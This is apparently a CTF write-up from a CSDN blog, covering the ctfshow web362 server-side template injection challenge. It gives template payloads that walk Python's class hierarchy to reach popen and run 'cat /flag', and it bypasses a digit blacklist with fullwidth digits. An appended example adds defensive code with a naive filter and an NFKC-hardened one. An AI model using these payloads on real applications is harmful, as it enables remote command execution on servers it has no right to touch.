ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={{"".__class__.__bases__[0].__subclasses__()}}
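Everything works normally up to this step.
From 12 onward it no longer works.
The digits are the problem. According to the writeup, replacing the normal digits with fullwidth digits bypasses this.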
?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
After that, it should be possible to proceed the normal way.
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
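Why the fullwidth-digit substitution above gets past a digit blacklist, and a check that does not miss it, as an added example that is not part of the original post. The blacklist (ASCII 1-9), the function names and the sample strings are constructed assumptions; the challenge's actual filter is not shown on the page.

```python
import unicodedata

# Assumption: the challenge's real filter is not shown on the page. This
# constructed stand-in rejects input that contains the ASCII digits 1-9.
BLOCKED = set("123456789")

# Constructed sample inputs (harmless index expressions).
ASCII_INPUT = "items[132]"
FULLWIDTH_INPUT = "items[\uff11\uff13\uff12]"    # fullwidth 1, 3, 2
ARABIC_INPUT = "items[\u0661\u0663\u0662]"       # Arabic-Indic 1, 3, 2
CLEAN_INPUT = "items[0]"


def naive_filter(value: str) -> bool:
    """Weak check: True (allowed) unless an ASCII digit from BLOCKED appears."""
    return not any(ch in BLOCKED for ch in value)


def hardened_filter(value: str) -> bool:
    """True (allowed) only if no character is, or folds to, a blocked digit."""
    # NFKC folds compatibility forms (fullwidth, superscript, circled) to ASCII.
    folded = unicodedata.normalize("NFKC", value)
    for ch in folded:
        if ch in BLOCKED:
            return False
        # Decimal digits of other scripts are unchanged by NFKC, yet int()
        # still reads them as numbers, so compare their numeric value too.
        if unicodedata.category(ch) == "Nd" and str(unicodedata.decimal(ch)) in BLOCKED:
            return False
    return True


def report() -> dict:
    """Run both filters over the samples: {input: (naive_ok, hardened_ok)}."""
    samples = (ASCII_INPUT, FULLWIDTH_INPUT, ARABIC_INPUT, CLEAN_INPUT)
    return {s: (naive_filter(s), hardened_filter(s)) for s in samples}


if __name__ == "__main__":
    # Python itself treats the fullwidth run as the number 132.
    print(int("\uff11\uff13\uff12"))
    for text, (naive_ok, hardened_ok) in report().items():
        print(f"{text!r}: naive={naive_ok} hardened={hardened_ok}")
```

The naive check passes the fullwidth form even though Python reads it as the same number, which is the gap the substitution relies on.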
Copyright notice
This article was written by [m0_62094846]. Please include a link to the original when reposting. Thank you.
https://blog.csdn.net/m0_62094846/article/details/124361669